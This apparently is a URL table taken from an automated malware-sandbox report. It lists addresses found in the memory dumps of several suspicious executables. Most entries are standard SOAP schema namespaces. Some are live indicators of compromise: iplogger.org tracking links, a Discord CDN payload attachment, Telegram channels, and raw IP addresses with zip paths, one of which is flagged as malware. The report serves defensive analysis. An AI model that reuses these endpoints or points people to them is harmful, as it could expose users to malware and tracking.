https://t.me/spmhausB	real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6315198?product=	59095662396535248957003083.29.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/1006526153294618657/1009394950338781266/2.0.2-beta_Nwjkxkwv.j	SETUP_~1.EXE, 00000028.00000002.844033249.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.844008041.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows	59095662396535248957003083.29.dr	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AEX	WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://iplogger.org/1AGmX41AGmX4	65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
https://support.google.com/chrome?p=update_error	real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	craw_window.js.3.dr	false		high
http://135.181.104.248/0586872789.zipowsp	real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.840936360.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AZmX4	real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/Google	65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
https://api.ip.sb/ip	WSkT8d093C.exe, namdoitntn.exe, 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, ffnameedit.exe.1.dr	false	URL Reputation: safe	unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	craw_window.js.3.dr, craw_background.js.3.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js	craw_window.js.3.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Np8Ya6aNEbkh.20.dr	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ctldl.windowsup/1571	real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://62.204.41.126:80	WSkT8d093C.exe, WW1.exe, 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, WW1.exe, 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/dot2.gif	craw_window.js.3.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://62.204.41.126:801170NULL%s	WW1.exe, 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, WW1.exe, 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	true	Avira URL Cloud: safe	low
https://www.google.com/images/cleardot.gif	craw_window.js.3.dr	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AJmX41AJmX4	65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cutt.ly	SETUP_~1.EXE, 00000028.00000002.840936360.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1AAh	WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://accounts.google.com/MergeSession	craw_window.js.3.dr	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://135.181.104.248/.	real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://135.181.104.248/0	real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro	59095662396535248957003083.29.dr	false		high
https://t.me/v_total	brokerius.exe, 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/	59095662396535248957003083.29.dr	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://135.181.104.248/)	real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com	SETUP_~1.EXE, 00000028.00000002.844033249.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mas.to/	brokerius.exe, 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	false	URL Reputation: safe	unknown
http://www.company.com/83886080NewProduct000100NewProduct1NewProduct	WSkT8d093C.exe	false		high
http://tempuri.org/Entity/Id13Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
